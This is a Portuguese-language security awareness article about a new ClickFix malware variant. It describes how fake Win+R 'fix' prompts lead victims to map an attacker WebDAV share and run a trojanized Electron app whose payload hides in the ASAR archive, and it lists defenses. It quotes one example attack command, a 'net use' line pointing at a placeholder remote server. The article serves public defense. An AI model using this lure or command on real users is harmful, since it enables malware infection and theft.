O malware ClickFix voltou a preocupar especialistas em segurança digital após o surgimento de uma nova variante ainda mais sofisticada. O golpe, que já vinha circulando em campanhas de engenharia social, agora utiliza um método silencioso para instalar malware em computadores Windows, explorando comandos legítimos do sistema.
O cenário geralmente começa com algo aparentemente inofensivo. Um site exibe uma mensagem afirmando que é necessário pressionar Win+R para corrigir um erro, atualizar o navegador ou resolver um captcha. O procedimento parece simples, mas na realidade pode abrir a porta para uma infecção completa do sistema.
Pesquisadores de segurança identificaram recentemente uma evolução dessa técnica que utiliza servidores WebDAV, unidades de rede mapeadas e aplicativos aparentemente legítimos para distribuir trojans. A campanha foi analisada por especialistas da Atos, que alertam para o fato de que o ataque consegue contornar soluções de segurança tradicionais.
O ponto mais preocupante é que até ferramentas amplamente utilizadas, como o Microsoft Defender, podem inicialmente não detectar a ameaça, já que o ataque utiliza apenas funcionalidades legítimas do sistema operacional.
Neste artigo, você vai entender como funciona essa nova variante do malware ClickFix, por que ela consegue enganar antivírus comuns e quais medidas podem impedir que seu computador seja comprometido.
O que é o malware ClickFix e como ele evoluiu
O chamado malware ClickFix é uma campanha de ataque baseada principalmente em engenharia social, uma técnica que manipula o comportamento do usuário para executar ações que comprometem o sistema.
Nas primeiras campanhas desse tipo, os criminosos induziam as vítimas a abrir o Executar do Windows usando Win+R e colar comandos que utilizavam ferramentas como PowerShell ou MSHTA. Esses comandos eram responsáveis por baixar e executar cargas maliciosas diretamente da internet.
Com o tempo, essas técnicas passaram a ser mais facilmente detectadas por ferramentas de segurança, o que levou os atacantes a adaptar suas estratégias.
A nova variante do ClickFix introduz uma mudança importante no processo de infecção: o uso do comando net use para mapear uma unidade de rede remota controlada pelos criminosos.
O comando geralmente segue um formato semelhante a: net use X: https://servidor-remoto/webdav
Ao executar esse comando no Executar do Windows, o sistema cria uma unidade de rede que parece legítima. No entanto, essa unidade está conectada diretamente a um servidor controlado pelos atacantes.
Esse método permite que arquivos maliciosos sejam distribuídos como se estivessem hospedados em um servidor corporativo comum.
Anatomia do ataque: do comando Win+R ao aplicativo trojanizado
Depois que a unidade de rede é criada, o usuário é incentivado a acessar ou executar um aplicativo hospedado naquele local remoto. É nesse ponto que o malware realmente entra em ação.
A farsa do WorkFlowy: quando um aplicativo legítimo vira armadilha
Uma das campanhas identificadas utiliza uma versão modificada do aplicativo WorkFlowy, conhecido por ser uma ferramenta de organização e produtividade.
Os atacantes distribuem uma versão antiga do aplicativo, aparentemente funcional e legítima, mas que foi alterada para incluir código malicioso.
Como o programa abre normalmente e apresenta a interface original, muitas vítimas não percebem que o software foi adulterado.
Enquanto o usuário acredita estar utilizando apenas um aplicativo de produtividade, o trojan executa atividades maliciosas em segundo plano.
O segredo está no arquivo ASAR
O WorkFlowy é desenvolvido utilizando a plataforma Electron, muito popular para a criação de aplicativos de desktop baseados em tecnologias web.
Aplicativos construídos com Electron geralmente armazenam seus arquivos internos dentro de um contêiner chamado ASAR.
Esse arquivo reúne scripts, recursos visuais e outros componentes necessários para o funcionamento do programa.
Os criminosos exploram justamente esse mecanismo.
O código malicioso é inserido dentro do arquivo ASAR, misturado ao código legítimo do aplicativo. Dessa forma, o malware passa a fazer parte da estrutura interna do programa.
Como muitos antivírus verificam apenas o executável principal, scripts escondidos dentro do ASAR podem não ser detectados imediatamente.
Isso permite que o trojan realize diversas atividades sem chamar atenção, incluindo:
- coleta de informações do sistema
- comunicação com servidores de comando e controle
- download de novos módulos de malware
- instalação de backdoors
Por que essa ameaça consegue enganar antivírus
Uma das razões pelas quais essa nova variante do malware ClickFix é tão perigosa está no fato de que ela utiliza apenas ferramentas legítimas do próprio sistema operacional.
O comando net use, por exemplo, é amplamente utilizado em redes corporativas para conectar computadores a servidores de arquivos. Portanto, sua execução não é necessariamente considerada suspeita.
O uso de WebDAV também contribui para disfarçar o ataque, já que o protocolo permite acessar arquivos remotos como se fossem pastas locais do sistema.
Outro fator importante é o uso de aplicativos baseados em Electron, que já possuem estruturas complexas com múltiplos scripts e recursos internos. Isso dificulta a identificação de código malicioso escondido dentro do aplicativo.
Em muitos casos, sistemas de segurança tradicionais analisam apenas o comportamento inicial do programa. Como o aplicativo abre normalmente e não executa ações suspeitas imediatamente, ele pode passar despercebido.
Por esse motivo, especialistas recomendam abordagens mais avançadas de segurança, como Threat Hunting, que consiste na análise proativa de atividades suspeitas dentro do sistema ou da rede.
Como se proteger dessa nova ameaça
Apesar da sofisticação dessa campanha, algumas práticas simples podem reduzir drasticamente o risco de infecção.
A primeira regra é nunca executar comandos desconhecidos no Executar do Windows.
Se um site pedir para você pressionar Win+R e colar um comando para resolver um problema, isso deve ser tratado como um forte sinal de alerta.
Empresas legítimas praticamente nunca utilizam esse tipo de procedimento para solucionar erros de navegação ou autenticação.
Outras medidas importantes incluem:
- Evite executar aplicativos vindos de unidades de rede desconhecidas: Se o sistema solicitar a execução de um aplicativo vindo de uma unidade recém-mapeada, verifique cuidadosamente a origem antes de abrir o arquivo.
- Mantenha o sistema atualizado: Atualizações frequentes do Windows e do antivírus aumentam as chances de detectar novas variantes de malware.
- Monitore processos suspeitos: Aplicativos baseados em Electron trojanizados podem gerar processos inesperados ou conexões externas incomuns.
- Verifique arquivos suspeitos no sistema: Em algumas infecções observadas por pesquisadores, o malware cria arquivos como id.txt dentro da pasta AppData do usuário. Esse tipo de artefato pode indicar comprometimento.
- Monitoramento em redes corporativas: Administradores de sistemas devem monitorar atividades relacionadas ao comando net use e conexões WebDAV inesperadas em estações de trabalho.
Conclusão
A nova campanha envolvendo o malware ClickFix mostra como ataques modernos estão cada vez mais focados na manipulação do usuário e no uso de recursos legítimos do sistema.
Ao combinar engenharia social, comandos do próprio Windows e aplicativos adulterados baseados em Electron, os criminosos conseguem contornar diversas camadas de segurança tradicionais.
Esse tipo de ataque reforça a importância da conscientização digital. Mesmo os melhores antivírus podem falhar quando o próprio usuário executa comandos perigosos sem perceber.
Por isso, entender como essas campanhas funcionam é fundamental para evitar infecções.
Compartilhar esse tipo de alerta com colegas, amigos e equipes de trabalho pode ajudar a impedir que novas vítimas caiam nesse tipo de armadilha digital.
